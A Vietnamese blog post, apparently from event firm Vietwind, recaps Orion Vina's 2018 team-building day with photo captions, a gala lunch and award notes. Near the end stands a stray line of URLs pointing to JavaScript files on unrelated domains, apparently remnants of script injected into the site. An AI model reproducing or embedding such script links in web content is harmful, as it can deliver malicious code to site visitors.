Ngày Hội Đồng Tâm 2018 – Công ty TNHH thực phẩm Orion Vina

Tiếp nối thành công rực rỡ của Ngày Hội Đồng Tâm 2017, Vietwind tiếp tục được đồng hành cùng hơn 300 CBNV Công ty TNHH thực phẩm Orion Vina trong chương trình team building Ngày Hội Đồng Tâm 2018 diễn ra tại khách sạn Mường Thanh, Bắc Ninh. Mang chủ đề Sức mạnh thống nhất với những điểm mới lạ trong các trò chơi team building, Vietwind mong muốn các thành viên đại gia đình Orion Vina ngày càng gắn kết và bứt phá để hoàn thành những mục tiêu trong năm 2018.

Công ty TNHH Thực phẩm Orion Vina được đánh giá là một trong những thương hiệu bánh kẹo hàng đầu Việt Nam, được đầu tư trực tiếp từ Tập đoàn Orion đến từ Hàn Quốc. Không chỉ trú trọng đầu tư vào hệ thống sản xuất, Orion Vina còn luôn quan tâm đến đời sống tinh thần của các thành viên. Ngày Hội Đồng Tâm là một hoạt động thường niên với những hoạt động team building gắn kết nhằm tạo nên sự kết nối giữa ban lãnh đạo và những nhân viên trong công ty.

Orion Vina – Ngày Hội Đồng Tâm 2018: Sức mạnh thống nhất

Có cơ hội được đồng hành cùng Công ty TNHH Thực phẩm Orion Vina sau 1 năm, ekip Vietwind có thể thấy rõ sức trẻ và tinh thần nhiệt huyết của mỗi thành viên chưa bao giờ thay đổi. Phải chăng, những trò chơi team building tập thể đã đem lại tinh thần gắn kết tuyệt vời hay một môi trường văn hóa nội bộ vững mạnh của một doanh nghiệp lớn đã tạo nên những con người luôn tràn đầy nhiệt huyết và cảm hứng như vậy?

Cùng Vietwind nhìn lại những khoảnh khắc ấn tượng của các thành viên Orion Vina để tìm ra câu trả lời

LAG_4173 (Copy) (Copy)

LAG_4184 (Copy) (Copy)

LAG_4233 (Copy) (Copy)

LAG_4257 (Copy) (Copy)

LAG_4297 (Copy) (Copy)

LAG_4298 (Copy) (Copy)

LAG_4319 (Copy) (Copy)

LAG_4326 (Copy) (Copy)

LAG_4329 (Copy) (Copy)

LAG_4337 (Copy) (Copy)
LAG_4380 (Copy) (Copy)

LAG_4415 (Copy) (Copy)

 

Chương trình Gala Lunch

Hào hứng, sôi nổi, tràn ngập tiếng cười, các thành viên đại gia đình Orion Vina đã có một bữa tiệc Gala Lunch tràn đầy màu sắc với những tiết mục biểu diễn chuyên nghiệp đến từ ekip Vietwind và không thể không nhắc đến những màn trình diễn có 1-0-2 đến từ chính những nhân viên tài năng của công ty.

LAG_4443 (Copy) (Copy)

LAG_4510 (Copy) (Copy)

LAG_4462 (Copy) (Copy)

LAG_4475 (Copy) (Copy)


Tại đây, những cá nhân và tập thể xuất sắc đã được ban lãnh đạo vinh danh, khen thưởng xứng đáng. Bên cạnh đó, chương trình bốc thăm may mắn cùng với những phần quà bất ngờ, bí mật là điểm nhấn của bữa tiệc.

LAG_4742 (Copy) (Copy)


Orion Vina Ngày Hội Đồng Tâm 2018 - Vietwind

Bất cứ doanh nghiệp nào cũng muốn nơi làm việc trở thành ngôi nhà thứ 2 của CBNV. Tuy nhiên, để thực hiện điều đó không phải chuyện ngày một ngày hai, mà doanh nghiệp cần tạo ra những hoạt động văn hóa nội bộ thiết thực, ý nghĩa. Bởi niềm tin, sự sẻ chia và gắn kết chính là những viên gạch xây đắp nên một ngôi nhà vững chắc. 

Tinh thần hào hứng, sôi nổi và chơi hết mình của CBNV Orion Vina tạo nên sự thành công của chương trình Ngày Hội Đồng Tâm 2018. Chúng tôi có thể thấy được, chính sức mạnh gắn kết đã tạo nên nguồn sức mạnh nội lực giúp Orion trở thành một trong những thương hiệu bánh kẹo dẫn đầu tại thị trường Việt Nam.

Cảm ơn Orion Vina vì đã tiếp tục tin tưởng và đồng hành cùng Vietwind!

https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&youtu.be/SWjVJMaIrgo

* * * * *

Xem ngay gói Tour du lịch 2019 ưu đãi nhất dành cho doanh nghiệp

Click ngay để khám phá chương trình  !

DU-LỊCH-TRE


Facebook Comments

Bài Viết Liên Quan